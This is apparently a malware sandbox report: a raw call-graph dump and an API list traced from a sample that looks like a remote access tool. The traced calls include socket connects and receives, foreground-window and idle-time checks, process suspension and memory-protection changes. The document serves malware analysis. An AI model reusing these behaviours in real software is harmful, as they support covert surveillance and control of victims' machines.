___scrt_fastfail 53271->53278 53273 10006cc1 53273->53220 53273->53223 53275 10006ea2 GetCPInfo 53274->53275 53274->53276 53275->53276 53275->53278 53316 10002ada 53276->53316 53306 10006acb GetCPInfo 53278->53306 53279->53216 53280->53213 53281->53222 53282->53216 53283->53227 53284->53231 53285->53237 53286->53236 53287->53241 53288->53245 53291->53253 53292->53253 53293->53253 53295 100054c4 53294->53295 53301 100054ba 53294->53301 53296 10005af6 _abort 36 API calls 53295->53296 53295->53301 53297 100054e5 53296->53297 53302 10007a00 36 API calls __fassign 53297->53302 53299 100054fe 53303 10007a2d 36 API calls __fassign 53299->53303 53301->53258 53301->53259 53302->53299 53303->53301 53304->53268 53305->53266 53307 10006b05 53306->53307 53315 10006baf 53306->53315 53323 100086e4 53307->53323 53310 10002ada _ValidateLocalCookies 5 API calls 53312 10006c5b 53310->53312 53312->53276 53314 10008a3e 41 API calls 53314->53315 53315->53310 53317 10002ae3 53316->53317 53318 10002ae5 IsProcessorFeaturePresent 53316->53318 53317->53273 53320 10002b58 53318->53320 53393 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53320->53393 53322 10002c3b 53322->53273 53324 100054a7 __fassign 36 API calls 53323->53324 53325 10008704 MultiByteToWideChar 53324->53325 53327 10008742 53325->53327 53335 100087da 53325->53335 53328 10008763 ___scrt_fastfail 53327->53328 53330 100056d0 20 API calls 53327->53330 53332 100087d4 53328->53332 53334 100087a8 MultiByteToWideChar 53328->53334 53329 10002ada _ValidateLocalCookies 5 API calls 53331 10006b66 53329->53331 53330->53328 53337 10008a3e 53331->53337 53342 10008801 19 API calls _free 53332->53342 53334->53332 53336 100087c4 GetStringTypeW 53334->53336 53335->53329 53336->53332 53338 100054a7 __fassign 36 API calls 53337->53338 53339 10008a51 53338->53339 53343 10008821 53339->53343 53342->53335 53344 1000883c 53343->53344 53345 10008862 MultiByteToWideChar 53344->53345 53346 10008a16 
53345->53346 53347 1000888c 53345->53347 53348 10002ada _ValidateLocalCookies 5 API calls 53346->53348 53350 100056d0 20 API calls 53347->53350 53353 100088ad 53347->53353 53349 10006b87 53348->53349 53349->53314 53350->53353 53351 100088f6 MultiByteToWideChar 53352 10008962 53351->53352 53354 1000890f 53351->53354 53379 10008801 19 API calls _free 53352->53379 53353->53351 53353->53352 53370 10005f19 53354->53370 53358 10008971 53362 100056d0 20 API calls 53358->53362 53365 10008992 53358->53365 53359 10008939 53359->53352 53361 10005f19 10 API calls 53359->53361 53360 10008a07 53378 10008801 19 API calls _free 53360->53378 53361->53352 53362->53365 53363 10005f19 10 API calls 53366 100089e6 53363->53366 53365->53360 53365->53363 53366->53360 53367 100089f5 WideCharToMultiByte 53366->53367 53367->53360 53368 10008a35 53367->53368 53380 10008801 19 API calls _free 53368->53380 53381 10005c45 53370->53381 53372 10005f40 53373 10005f49 53372->53373 53385 10005fa1 9 API calls 2 library calls 53372->53385 53376 10002ada _ValidateLocalCookies 5 API calls 53373->53376 53375 10005f89 LCMapStringW 53375->53373 53377 10005f9b 53376->53377 53377->53352 53377->53358 53377->53359 53378->53352 53379->53346 53380->53352 53382 10005c71 53381->53382 53384 10005c75 __crt_fast_encode_pointer 53381->53384 53382->53384 53386 10005ce1 53382->53386 53384->53372 53385->53375 53387 10005d02 LoadLibraryExW 53386->53387 53388 10005cf7 53386->53388 53389 10005d37 53387->53389 53390 10005d1f GetLastError 53387->53390 53388->53382 53389->53388 53392 10005d4e FreeLibrary 53389->53392 53390->53389 53391 10005d2a LoadLibraryExW 53390->53391 53391->53389 53392->53388 53393->53322 53394 434906 53399 434bd8 SetUnhandledExceptionFilter 53394->53399 53396 43490b pre_c_initialization 53400 4455cc 20 API calls 2 library calls 53396->53400 53398 434916 53399->53396 53400->53398 53401 1000c7a7 53402 1000c7be 53401->53402 53409 1000c82c 53401->53409 53402->53409 53411 1000c7e6 GetModuleHandleA 53402->53411 
53403 1000c872 53404 1000c835 GetModuleHandleA 53406 1000c83f 53404->53406 53406->53406 53406->53409 53409->53403 53409->53404 53412 1000c7ef 53411->53412 53418 1000c82c 53411->53418 53421 1000c803 53412->53421 53414 1000c872 53415 1000c835 GetModuleHandleA 53416 1000c83f 53415->53416 53416->53416 53416->53418 53418->53414 53418->53415 53422 1000c809 53421->53422 53423 1000c82c 53422->53423 53424 1000c80d VirtualProtect 53422->53424 53426 1000c835 GetModuleHandleA 53423->53426 53427 1000c872 53423->53427 53424->53423 53425 1000c81c VirtualProtect 53424->53425 53425->53423 53428 1000c83f 53426->53428 53428->53423 53429 43bea8 53432 43beb4 _swprintf ___DestructExceptionObject 53429->53432 53430 43bec2 53445 44062d 20 API calls _Atexit 53430->53445 53432->53430 53433 43beec 53432->53433 53440 445909 EnterCriticalSection 53433->53440 53435 43bef7 53441 43bf98 53435->53441 53436 43bec7 ___DestructExceptionObject __cftof 53440->53435 53442 43bfa6 53441->53442 53442->53442 53444 43bf02 53442->53444 53447 4497ec 37 API calls 2 library calls 53442->53447 53446 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 53444->53446 53445->53436 53446->53436 53447->53442 53448 4458c8 53450 4458d3 53448->53450 53451 4458fc 53450->53451 53452 4458f8 53450->53452 53454 448b04 53450->53454 53461 445920 DeleteCriticalSection 53451->53461 53462 44854a 53454->53462 53457 448b49 InitializeCriticalSectionAndSpinCount 53458 448b34 53457->53458 53469 43502b 53458->53469 53460 448b60 53460->53450 53461->53452 53463 448576 53462->53463 53464 44857a 53462->53464 53463->53464 53466 44859a 53463->53466 53476 4485e6 53463->53476 53464->53457 53464->53458 53466->53464 53467 4485a6 GetProcAddress 53466->53467 53468 4485b6 __crt_fast_encode_pointer 53467->53468 53468->53464 53470 435036 IsProcessorFeaturePresent 53469->53470 53471 435034 53469->53471 53473 435078 53470->53473 53471->53460 53483 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53473->53483 
53475 43515b 53475->53460 53477 448607 LoadLibraryExW 53476->53477 53481 4485fc 53476->53481 53478 448624 GetLastError 53477->53478 53479 44863c 53477->53479 53478->53479 53482 44862f LoadLibraryExW 53478->53482 53480 448653 FreeLibrary 53479->53480 53479->53481 53480->53481 53481->53463 53482->53479 53483->53475 53484 41e04e 53485 41e063 ctype ___scrt_fastfail 53484->53485 53486 41e266 53485->53486 53503 432f55 21 API calls _Yarn 53485->53503 53492 41e21a 53486->53492 53498 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 53486->53498 53489 41e277 53489->53492 53499 432f55 21 API calls _Yarn 53489->53499 53491 41e213 ___scrt_fastfail 53491->53492 53504 432f55 21 API calls _Yarn 53491->53504 53494 41e2b0 ___scrt_fastfail 53494->53492 53500 4335db 53494->53500 53496 41e240 ___scrt_fastfail 53496->53492 53505 432f55 21 API calls _Yarn 53496->53505 53498->53489 53499->53494 53506 4334fa 53500->53506 53502 4335e3 53502->53492 53503->53491 53504->53496 53505->53486 53507 433513 53506->53507 53511 433509 53506->53511 53507->53511 53512 432f55 21 API calls _Yarn 53507->53512 53509 433534 53509->53511 53513 4338c8 CryptAcquireContextA 53509->53513 53511->53502 53512->53509 53514 4338e9 CryptGenRandom 53513->53514 53515 4338e4 53513->53515 53514->53515 53516 4338fe CryptReleaseContext 53514->53516 53515->53511 53516->53515 53517 426c6d 53523 426d42 recv 53517->53523 53524 426a77 53525 426a8c 53524->53525 53532 426b1e 53524->53532 53526 426b83 53525->53526 53527 426b0e 53525->53527 53528 426bae 53525->53528 53525->53532 53534 426b4e 53525->53534 53536 426ad9 53525->53536 53538 426bd5 53525->53538 53552 424f6e 49 API calls ctype 53525->53552 53526->53528 53556 425781 21 API calls 53526->53556 53527->53532 53527->53534 53554 424f6e 49 API calls ctype 53527->53554 53528->53532 53528->53538 53540 425b72 53528->53540 53534->53526 53534->53532 53555 41fbfd 52 API calls 53534->53555 53536->53527 53536->53532 53553 41fbfd 52 API calls 
53536->53553 53538->53532 53557 4261e6 28 API calls 53538->53557 53541 425b91 ___scrt_fastfail 53540->53541 53543 425ba0 53541->53543 53547 425bc5 53541->53547 53558 41ec4c 21 API calls 53541->53558 53543->53547 53551 425ba5 53543->53551 53559 420669 46 API calls 53543->53559 53546 425bae 53546->53547 53562 424d96 21 API calls 2 library calls 53546->53562 53547->53538 53549 425c48 53549->53547 53560 432f55 21 API calls _Yarn 53549->53560 53551->53546 53551->53547 53561 41daf0 49 API calls 53551->53561 53552->53536 53553->53536 53554->53534 53555->53534 53556->53528 53557->53532 53558->53543 53559->53549 53560->53551 53561->53546 53562->53547 53563 4165db 53574 401e65 53563->53574 53565 4165eb 53566 4020f6 28 API calls 53565->53566 53567 4165f6 53566->53567 53568 401e65 22 API calls 53567->53568 53569 416601 53568->53569 53570 4020f6 28 API calls 53569->53570 53571 41660c 53570->53571 53579 412965 53571->53579 53575 401e6d 53574->53575 53576 401e75 53575->53576 53598 402158 22 API calls 53575->53598 53576->53565 53599 40482d 53579->53599 53581 412979 53606 4048c8 connect 53581->53606 53585 41299a 53671 402f10 53585->53671 53588 404aa1 61 API calls 53589 4129ae 53588->53589 53590 401fd8 11 API calls 53589->53590 53591 4129b6 53590->53591 53676 404c10 53591->53676 53594 401fd8 11 API calls 53595 4129cc 53594->53595 53596 401fd8 11 API calls 53595->53596 53597 4129d4 53596->53597 53600 404846 socket 53599->53600 53601 404839 53599->53601 53603 404860 CreateEventW 53600->53603 53604 404842 53600->53604 53694 40489e WSAStartup 53601->53694 53603->53581 53604->53581 53605 40483e 53605->53600 53605->53604 53607 404a1b 53606->53607 53608 4048ee 53606->53608 53609 40497e 53607->53609 53610 404a21 WSAGetLastError 53607->53610 53608->53609 53611 404923 53608->53611 53695 40531e 53608->53695 53666 402f31 53609->53666 53610->53609 53612 404a31 53610->53612 53730 420cf1 27 API calls 53611->53730 53614 404932 53612->53614 53615 404a36 53612->53615 53620 402093 28 API calls 
53614->53620 53735 41cb72 30 API calls 53615->53735 53617 40490f 53700 402093 53617->53700 53619 40492b 53619->53614 53623 404941 53619->53623 53624 404a80 53620->53624 53622 404a40 53736 4052fd 28 API calls 53622->53736 53632 404950 53623->53632 53633 404987 53623->53633 53627 402093 28 API calls 53624->53627 53630 404a8f 53627->53630 53635 41b580 80 API calls 53630->53635 53634 402093 28 API calls 53632->53634 53732 421ad1 54 API calls 53633->53732 53638 40495f 53634->53638 53635->53609 53641 402093 28 API calls 53638->53641 53640 40498f 53643 4049c4 53640->53643 53644 404994 53640->53644 53645 40496e 53641->53645 53734 420e97 28 API calls 53643->53734 53648 402093 28 API calls 53644->53648 53649 41b580 80 API calls 53645->53649 53651 4049a3 53648->53651 53652 404973 53649->53652 53650 4049cc 53653 4049f9 CreateEventW CreateEventW 53650->53653 53656 402093 28 API calls 53650->53656 53654 402093 28 API calls 53651->53654 53731 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53652->53731 53653->53609 53655 4049b2 53654->53655 53657 41b580 80 API calls 53655->53657 53659 4049e2 53656->53659 53660 4049b7 53657->53660 53661 402093 28 API calls 53659->53661 53733 421143 52 API calls 53660->53733 53663 4049f1 53661->53663 53664 41b580 80 API calls 53663->53664 53665 4049f6 53664->53665 53665->53653 53667 4020df 11 API calls 53666->53667 53668 402f3d 53667->53668 53669 4032a0 28 API calls 53668->53669 53670 402f59 53669->53670 53670->53585 53787 401fb0 53671->53787 53673 402f1e 53674 402055 11 API calls 53673->53674 53675 402f2d 53674->53675 53675->53588 53677 4020df 11 API calls 53676->53677 53678 404c27 53677->53678 53679 4020df 11 API calls 53678->53679 53682 404c30 53679->53682 53680 43bda0 _Yarn 21 API calls 53680->53682 53682->53680 53683 4020b7 28 API calls 53682->53683 53684 404ca1 53682->53684 53688 401fd8 11 API calls 53682->53688 53790 404b96 53682->53790 53796 401fe2 53682->53796 53805 404cc3 53682->53805 53683->53682 53817 404e26 
WaitForSingleObject 53684->53817 53688->53682 53689 401fd8 11 API calls 53690 404cb1 53689->53690 53691 401fd8 11 API calls 53690->53691 53692 404cba 53691->53692 53692->53594 53694->53605 53696 4020df 11 API calls 53695->53696 53697 40532a 53696->53697 53737 4032a0 53697->53737 53699 405346 53699->53617 53701 40209b 53700->53701 53702 4023ce 11 API calls 53701->53702 53703 4020a6 53702->53703 53741 4024ed 53703->53741 53706 41b580 53707 41b631 53706->53707 53708 41b596 GetLocalTime 53706->53708 53710 401fd8 11 API calls 53707->53710 53709 40531e 28 API calls 53708->53709 53711 41b5d8 53709->53711 53712 41b639 53710->53712 53745 406383 53711->53745 53714 401fd8 11 API calls 53712->53714 53716 41b641 53714->53716 53716->53611 53717 402f10 28 API calls 53718 41b5f0 53717->53718 53719 406383 28 API calls 53718->53719 53720 41b5fc 53719->53720 53750 40723b 77 API calls 53720->53750 53722 41b60a 53723 401fd8 11 API calls 53722->53723 53724 41b616 53723->53724 53725 401fd8 11 API calls 53724->53725 53726 41b61f 53725->53726 53727 401fd8 11 API calls 53726->53727 53728 41b628 53727->53728 53729 401fd8 11 API calls 53728->53729 53729->53707 53730->53619 53731->53609 53732->53640 53733->53652 53734->53650 53735->53622 53739 4032aa 53737->53739 53738 4032c9 53738->53699 53739->53738 53740 4028e8 28 API calls 53739->53740 53740->53738 53742 4024f9 53741->53742 53743 40250a 28 API calls 53742->53743 53744 4020b1 53743->53744 53744->53706 53751 4051ef 53745->53751 53747 406391 53755 402055 53747->53755 53750->53722 53752 4051fb 53751->53752 53761 405274 53752->53761 53754 405208 53754->53747 53756 402061 53755->53756 53757 4023ce 11 API calls 53756->53757 53758 40207b 53757->53758 53783 40267a 53758->53783 53762 405282 53761->53762 53763 405288 53762->53763 53764 40529e 53762->53764 53772 4025f0 53763->53772 53766 4052f5 53764->53766 53767 4052b6 53764->53767 53781 4028a4 22 API calls 53766->53781 53770 4028e8 28 API calls 53767->53770 53771 40529c 53767->53771 53770->53771 
53771->53754 53773 402888 22 API calls 53772->53773 53774 402602 53773->53774 53775 402672 53774->53775 53776 402629 53774->53776 53782 4028a4 22 API calls 53775->53782 53778 4028e8 28 API calls 53776->53778 53780 40263b 53776->53780 53778->53780 53780->53771 53784 40268b 53783->53784 53785 4023ce 11 API calls 53784->53785 53786 40208d 53785->53786 53786->53717 53788 4025f0 28 API calls 53787->53788 53789 401fbd 53788->53789 53789->53673 53791 404ba0 WaitForSingleObject 53790->53791 53792 404bcd recv 53790->53792 53830 421107 54 API calls 53791->53830 53794 404be0 53792->53794 53794->53682 53795 404bbc SetEvent 53795->53794 53797 401ff1 53796->53797 53798 402039 53796->53798 53799 4023ce 11 API calls 53797->53799 53798->53682 53800 401ffa 53799->53800 53801 40203c 53800->53801 53803 402015 53800->53803 53802 40267a 11 API calls 53801->53802 53802->53798 53831 403098 28 API calls 53803->53831 53806 4020df 11 API calls 53805->53806 53807 404cde 53806->53807 53808 404e13 53807->53808 53811 4041a2 28 API calls 53807->53811 53812 401fe2 28 API calls 53807->53812 53813 401fd8 11 API calls 53807->53813 53814 4020f6 28 API calls 53807->53814 53832 401fc0 53807->53832 53809 401fd8 11 API calls 53808->53809 53810 404e1c 53809->53810 53810->53682 53811->53807 53812->53807 53813->53807 53814->53807 53818 404e40 SetEvent CloseHandle 53817->53818 53819 404e57 closesocket 53817->53819 53820 404ca8 53818->53820 53821 404e64 53819->53821 53820->53689 53822 404e7a 53821->53822 54158 4050e4 84 API calls 53821->54158 53824 404e8c WaitForSingleObject 53822->53824 53825 404ece SetEvent CloseHandle 53822->53825 54159 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53824->54159 53825->53820 53827 404e9b SetEvent WaitForSingleObject 54160 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53827->54160 53829 404eb3 SetEvent CloseHandle CloseHandle 53829->53825 53830->53795 53831->53798 53833 401fd2 CreateEventA CreateThread WaitForSingleObject 
CloseHandle 53832->53833 53834 401fc9 53832->53834 53833->53807 53837 415b25 53833->53837 53836 4025e0 28 API calls 53834->53836 53836->53833 53838 4020f6 28 API calls 53837->53838 53839 415b47 SetEvent 53838->53839 53840 415b5c 53839->53840 53916 4041a2 53840->53916 53843 4020f6 28 API calls 53844 415b86 53843->53844 53845 4020f6 28 API calls 53844->53845 53846 415b98 53845->53846 53919 41beac 53846->53919 53849 415bc1 GetTickCount 53941 41bc1f 53849->53941 53850 415d20 53914 415d11 53850->53914 53915 415d34 53850->53915 53851 401e8d 11 API calls 53853 4170cd 53851->53853 53856 401fd8 11 API calls 53853->53856 53858 4170d9 53856->53858 53860 401fd8 11 API calls 53858->53860 53859 415bde 53862 41bc1f 28 API calls 53859->53862 53861 4170e5 53860->53861 53863 415be9 53862->53863 53947 41bb27 53863->53947 53868 401e65 22 API calls 53869 415c13 53868->53869 53870 402f31 28 API calls 53869->53870 53871 415c21 53870->53871 53956 402ea1 28 API calls 53871->53956 53873 415c30 53874 402f10 28 API calls 53873->53874 53875 415c3f 53874->53875 53957 402ea1 28 API calls 53875->53957 53877 415c4e 53878 402f10 28 API calls 53877->53878 53879 415c5a 53878->53879 53958 402ea1 28 API calls 53879->53958 53881 415c64 53882 404aa1 61 API calls 53881->53882 53883 415c73 53882->53883 53884 401fd8 11 API calls 53883->53884 53885 415c7c 53884->53885 53886 401fd8 11 API calls 53885->53886 53887 415c88 53886->53887 53888 401fd8 11 API calls 53887->53888 53889 415c94 53888->53889 53890 401fd8 11 API calls 53889->53890 53891 415ca0 53890->53891 53892 401fd8 11 API calls 53891->53892 53893 415cac 53892->53893 53894 401fd8 11 API calls 53893->53894 53895 415cb8 53894->53895 53959 401f09 53895->53959 53898 401fd8 11 API calls 53899 415cca 53898->53899 53900 401fd8 11 API calls 53899->53900 53901 415cd3 53900->53901 53902 401e65 22 API calls 53901->53902 53903 415cde 53902->53903 53962 43bb2c 53903->53962 53906 415d16 53907 401e65 22 API calls 53906->53907 53907->53850 53908 415cf0 53909 415d09 
53908->53909 53910 415cfe 53908->53910 53967 404f51 53909->53967 53966 404ff4 82 API calls 53910->53966 53913 415d04 53913->53914 53914->53851 53982 4050e4 84 API calls 53915->53982 53983 40423a 53916->53983 53920 4020df 11 API calls 53919->53920 53921 41bebf 53920->53921 53924 41bf31 53921->53924 53927 4041a2 28 API calls 53921->53927 53932 401fe2 28 API calls 53921->53932 53936 401fd8 11 API calls 53921->53936 53940 41bf2f 53921->53940 53989 41cec5 53921->53989 53922 401fd8 11 API calls 53923 41bf61 53922->53923 53925 401fd8 11 API calls 53923->53925 53926 4041a2 28 API calls 53924->53926 53928 41bf69 53925->53928 53929 41bf3d 53926->53929 53927->53921 53930 401fd8 11 API calls 53928->53930 53931 401fe2 28 API calls 53929->53931 53933 415ba1 53930->53933 53934 41bf46 53931->53934 53932->53921 53933->53849 53933->53850 53933->53914 53935 401fd8 11 API calls 53934->53935 53937 41bf4e 53935->53937 53936->53921 53938 41cec5 28 API calls 53937->53938 53938->53940 53940->53922 54025 441ed1 53941->54025 53944 402093 28 API calls 53945 415bd2 53944->53945 53946 41bb77 GetLastInputInfo GetTickCount 53945->53946 53946->53859 54034 436f10 53947->54034 53952 41bdaf 53953 41bdbc 53952->53953 53954 4020b7 28 API calls 53953->53954 53955 415c05 53954->53955 53955->53868 53956->53873 53957->53877 53958->53881 53960 402252 11 API calls 53959->53960 53961 401f12 53960->53961 53961->53898 53963 43bb45 _strftime 53962->53963 54083 43ae83 53963->54083 53965 415ceb 53965->53906 53965->53908 53966->53913 53968 404f65 53967->53968 53969 404fea 53967->53969 53970 404f6e 53968->53970 53971 404fc0 CreateEventA CreateThread 53968->53971 53972 404f7d GetLocalTime 53968->53972 53969->53914 53970->53971 53971->53969 54154 405150 53971->54154 53973 41bc1f 28 API calls 53972->53973 53974 404f91 53973->53974 54153 4052fd 28 API calls 53974->54153 53982->53913 53984 404243 53983->53984 53985 4023ce 11 API calls 53984->53985 53986 40424e 53985->53986 53987 402569 28 API calls 53986->53987 53988 
4041b5 53987->53988 53988->53843 53990 41ced2 53989->53990 53991 41cf31 53990->53991 53996 41cee2 53990->53996 53992 41cf4b 53991->53992 53993 41d071 28 API calls 53991->53993 54009 41d1d7 28 API calls 53992->54009 53993->53992 53995 41cf2d 53995->53921 53997 41cf1a 53996->53997 54000 41d071 53996->54000 54008 41d1d7 28 API calls 53997->54008 54002 41d079 54000->54002 54001 41d0ab 54001->53997 54002->54001 54003 41d0af 54002->54003 54006 41d093 54002->54006 54020 402725 22 API calls 54003->54020 54010 41d0e2 54006->54010 54008->53995 54009->53995 54011 41d0ec __EH_prolog 54010->54011 54021 402717 22 API calls 54011->54021 54013 41d0ff 54022 41d1ee 11 API calls 54013->54022 54015 41d125 54016 41d15d 54015->54016 54023 402730 11 API calls 54015->54023 54016->54001 54018 41d144 54024 402712 11 API calls std::_Deallocate 54018->54024 54021->54013 54022->54015 54023->54018 54024->54016 54026 441edd 54025->54026 54029 441ccd 54026->54029 54028 41bc43 54028->53944 54030 441ce4 54029->54030 54032 441d1b __cftof 54030->54032 54033 44062d 20 API calls _Atexit 54030->54033 54032->54028 54033->54032 54035 41bb46 GetForegroundWindow GetWindowTextW 54034->54035 54036 40417e 54035->54036 54037 404186 54036->54037 54042 402252 54037->54042 54039 404191 54046 4041bc 54039->54046 54043 40225c 54042->54043 54044 4022ac 54042->54044 54043->54044 54050 402779 11 API calls std::_Deallocate 54043->54050 54044->54039 54047 4041c8 54046->54047 54051 4041d9 54047->54051 54049 40419c 54049->53952 54050->54044 54052 4041e9 54051->54052 54053 404206 54052->54053 54054 4041ef 54052->54054 54068 4027e6 54053->54068 54058 404267 54054->54058 54057 404204 54057->54049 54059 402888 22 API calls 54058->54059 54060 40427b 54059->54060 54061 404290 54060->54061 54062 4042a5 54060->54062 54079 4042df 22 API calls 54061->54079 54063 4027e6 28 API calls 54062->54063 54067 4042a3 54063->54067 54065 404299 54080 402c48 22 API calls 54065->54080 54067->54057 54069 4027ef 54068->54069 54070 402851 
54069->54070 54071 4027f9 54069->54071 54082 4028a4 22 API calls 54070->54082 54074 402802 54071->54074 54076 402815 54071->54076 54081 402aea 28 API calls __EH_prolog 54074->54081 54077 402813 54076->54077 54078 402252 11 API calls 54076->54078 54077->54057 54078->54077 54079->54065 54080->54067 54081->54077 54099 43ba8a 54083->54099 54085 43aed0 54105 43a837 54085->54105 54086 43ae95 54086->54085 54087 43aeaa 54086->54087 54098 43aeaf __cftof 54086->54098 54104 44062d 20 API calls _Atexit 54087->54104 54091 43aedc 54092 43af0b 54091->54092 54113 43bacf 40 API calls __Toupper 54091->54113 54095 43af77 54092->54095 54114 43ba36 20 API calls 2 library calls 54092->54114 54115 43ba36 20 API calls 2 library calls 54095->54115 54096 43b03e _strftime 54096->54098 54116 44062d 20 API calls _Atexit 54096->54116 54098->53965 54100 43baa2 54099->54100 54101 43ba8f 54099->54101 54100->54086 54117 44062d 20 API calls _Atexit 54101->54117 54103 43ba94 __cftof 54103->54086 54104->54098 54106 43a854 54105->54106 54108 43a84a 54105->54108 54106->54108 54118 448295 GetLastError 54106->54118 54108->54091 54109 43a875 54139 4483e4 36 API calls __Getctype 54109->54139 54111 43a88e 54140 448411 36 API calls __cftof 54111->54140 54113->54091 54114->54095 54115->54096 54116->54098 54117->54103 54119 4482b7 54118->54119 54120 4482ab 54118->54120 54142 445b74 20 API calls 3 library calls 54119->54142 54141 44883c 11 API calls 2 library calls 54120->54141 54123 4482b1 54123->54119 54125 448300 SetLastError 54123->54125 54124 4482c3 54126 4482cb 54124->54126 54149 448892 11 API calls 2 library calls 54124->54149 54125->54109 54143 446802 54126->54143 54128 4482e0 54128->54126 54130 4482e7 54128->54130 54150 448107 20 API calls __Getctype 54130->54150 54131 4482d1 54133 44830c SetLastError 54131->54133 54151 446175 36 API calls 4 library calls 54133->54151 54134 4482f2 54136 446802 _free 20 API calls 54134->54136 54138 4482f9 54136->54138 54137 448318 54138->54125 54138->54133 54139->54111 
54140->54108 54141->54123 54142->54124 54144 44680d HeapFree 54143->54144 54145 446836 __dosmaperr 54143->54145 54144->54145 54146 446822 54144->54146 54145->54131 54152 44062d 20 API calls _Atexit 54146->54152 54148 446828 GetLastError 54148->54145 54149->54128 54150->54134 54151->54137 54152->54148 54157 40515c 102 API calls 54154->54157 54156 405159 54157->54156 54158->53822 54159->53827 54160->53829 54161 44839e 54169 448790 54161->54169 54165 4483ba 54166 4483c7 54165->54166 54177 4483ca 11 API calls 54165->54177 54168 4483b2 54170 44854a __Getctype 5 API calls 54169->54170 54171 4487b7 54170->54171 54172 4487cf TlsAlloc 54171->54172 54173 4487c0 54171->54173 54172->54173 54174 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 54173->54174 54175 4483a8 54174->54175 54175->54168 54176 448319 20 API calls 2 library calls 54175->54176 54176->54165 54177->54168 54178 100020db 54181 100020e7 ___DestructExceptionObject 54178->54181 54179 100020f6 54180 10002110 dllmain_raw 54180->54179 54182 1000212a 54180->54182 54181->54179 54181->54180 54186 1000210b 54181->54186 54191 10001eec 54182->54191 54184 10002177 54184->54179 54185 10001eec 29 API calls 54184->54185 54187 1000218a 54185->54187 54186->54179 54186->54184 54188 10001eec 29 API calls 54186->54188 54187->54179 54189 10002193 dllmain_raw 54187->54189 54190 1000216d dllmain_raw 54188->54190 54189->54179 54190->54184 54192 10001ef7 54191->54192 54193 10001f2a dllmain_crt_process_detach 54191->54193 54194 10001f1c dllmain_crt_process_attach 54192->54194 54195 10001efc 54192->54195 54200 10001f06 54193->54200 54194->54200 54196 10001f01 54195->54196 54197 10001f12 54195->54197 54196->54200 54201 1000240b 25 API calls 54196->54201 54202 100023ec 27 API calls 54197->54202 54200->54186 54201->54200 54202->54200 54203 434918 54204 434924 ___DestructExceptionObject 54203->54204 54230 434627 54204->54230 54206 43492b 54208 434954 54206->54208 54536 434a8a IsProcessorFeaturePresent IsDebuggerPresent 

                            Control-flow Graph

                            APIs
                            • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                            • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                            • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                            • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                            • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                            • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                            • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                            • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                            • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                            • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
